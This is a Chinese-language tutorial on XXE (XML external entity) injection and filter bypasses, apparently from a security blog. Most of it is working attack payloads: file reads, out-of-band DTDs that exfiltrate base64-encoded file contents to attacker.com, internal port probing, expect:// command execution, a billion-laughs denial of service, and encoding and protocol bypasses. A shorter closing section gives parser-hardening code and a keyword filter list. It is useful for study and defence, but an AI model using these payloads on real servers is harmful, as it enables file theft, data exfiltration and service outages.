Web漏洞-XXE和XML利用检测绕过
字数 1138 2025-08-11 21:26:09
XXE漏洞与XML利用检测绕过详解
一、XXE漏洞概述
XXE(XML External Entity Injection)即XML外部实体注入漏洞,发生在应用程序解析XML输入时未禁用外部实体加载的情况下。攻击者可利用此漏洞:
- 读取服务器文件
- 执行命令
- 扫描内网端口
- 攻击内网网站
- 发起拒绝服务攻击
二、XML与HTML核心差异
| 特性 | XML | HTML |
|---|---|---|
| 设计目的 | 传输和存储数据,关注数据内容 | 显示内容,关注数据外观 |
| 可扩展性 | 可自定义标签 | 固定标签集 |
| 大小写敏感 | 是 | 否 |
| 标签闭合要求 | 必须严格闭合 | 部分标签可不闭合 |
三、XXE攻击手法详解
1. 文件读取
基础读取:
<?xml version="1.0"?>
<!DOCTYPE ANY [
<!ENTITY xxe SYSTEM "file:///d:/test.txt">
]>
<x>&xxe;</x>
Base64编码读取(处理含空格文件):
<?xml version="1.0"?>
<!DOCTYPE message [
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///d:/test.txt">
<!ENTITY % remote SYSTEM "http://attacker.com/evil.dtd">
%remote;
%send;
]>
对应evil.dtd内容:
<!ENTITY % all "<!ENTITY % send SYSTEM 'http://attacker.com/?data=%file;'>">
%all;
2. 内网探测与攻击
端口探测:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY rabbit SYSTEM "http://127.0.0.1:8080/index.txt">
]>
<x>&rabbit;</x>
通过响应时间判断端口状态:
- 响应快 → 端口开放
- 响应慢或无响应 → 端口关闭
3. 远程代码执行(需特定环境)
<?xml version="1.0"?>
<!DOCTYPE ANY [
<!ENTITY xxe SYSTEM "expect://id">
]>
<x>&xxe;</x>
4. 外部实体DTD引入
<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "http://attacker.com/evil.dtd">
%file;
]>
<x>&send;</x>
evil.dtd内容:
<!ENTITY send SYSTEM "file:///d:/test.txt">
5. 无回显文件读取
<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=test.txt">
<!ENTITY % dtd SYSTEM "http://attacker.com/test.dtd">
%dtd;
%send;
]>
test.dtd内容:
<!ENTITY % payload "<!ENTITY % send SYSTEM 'http://attacker.com/?data=%file;'>">
%payload;
6. 拒绝服务攻击
内存耗尽攻击:
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>
UNIX系统崩溃攻击:
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///dev/random">
]>
<foo>&xxe;</foo>
四、绕过技术
1. 关键词过滤绕过
UTF-16BE编码绕过:
cat payload.xml | iconv -f utf-8 -t utf-16be > payload.8-16be.xml
2. 协议利用绕过
data://协议:
<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY % a SYSTEM "data://text/plain;base64,PCFFTlRJVFkgJSBkIFNZU1RFTSAnaHR0cDovL2F0dGFja2VyLmNvbS9ldmlsLmR0ZCc+">
%a;
%d;
]>
<test>&hhh;</test>
file://协议+文件上传:
<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY % a SYSTEM "file:///var/www/uploads/uploaded.jpg">
%a;
]>
php://filter协议+文件上传:
<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY % a SYSTEM "php://filter/resource=/var/www/uploads/uploaded.jpg">
%a;
]>
<test>&hhh;</test>
五、XXE漏洞防御方案
1. 禁用外部实体
PHP:
libxml_disable_entity_loader(true);
Java:
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setExpandEntityReferences(false);
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
Python:
from lxml import etree
xmlData = etree.parse(xmlSource, etree.XMLParser(resolve_entities=False))
2. 输入过滤
过滤以下关键词:
<!DOCTYPE<!ENTITYSYSTEMPUBLIC
3. 其他措施
- 使用简单的数据格式(如JSON)替代XML
- 及时更新XML处理器库
- 实施严格的输入验证
- 配置XML处理器禁用DTD和外部实体
六、自动化检测工具
推荐工具:
- XXEinjector
- OWASP ZAP
- Burp Suite Scanner
- XXExploiter
通过全面理解XXE漏洞原理、攻击手法和防御措施,开发人员和安全工程师可以更有效地防范此类安全威胁。